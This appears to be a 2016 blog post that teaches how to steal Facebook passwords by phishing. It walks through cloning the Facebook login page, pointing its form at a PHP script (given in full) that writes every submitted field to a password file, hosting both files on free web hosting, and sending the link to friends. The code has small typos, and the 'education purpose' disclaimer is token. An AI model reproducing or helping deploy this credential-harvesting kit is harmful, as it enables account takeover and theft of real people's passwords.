How to hack facebook
- Nov 17, 2016
- 1 min read
Hi friends, In this blog I am going to explain process of hacking Facebook account through phishing. Phishing is the easiest way of stooling password of any website easily. In phishing we just creates one new website which looks similar like facebook or any other popular website & then victim types his password in box and we get that password in our hand. Follow the following steps to hack Facebook account

Phishing Step 1: Go to the login page of Facebook and save the page . Step 2: Rename that page as “index.htm” Step 3: then open that index.htm in notepad and search for ‘action=‘ you will find something like action=“http://www.facebook.com/login.php?login_attempt=1-” now delete “hhtp://www.facebook.com/login.php?login_attempt=1-” and replace it with action=“TBB.php” Step 4: Now create new file TBB.php in notepad and type the following text into it <?php header ('Location:http//www.google.com/'); $handle= fopen("password.txt", "a"); foreach($_POST as $variable =>$value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> and save it as TBB.php Step 5: Now upload the files index.html ( Created in step 2) & TBB.php (Created in step 4) to any web hosting sites with php feature. Simply google it or go to www.000webhost.com or www.xhosting.com and create your website their. Step 6: Now share link of your fake Facebook website to your friends and if they log in Facebook through your site their passwords will get sent to text file present on the web hosting file manager. (Only for education purpose)
Comments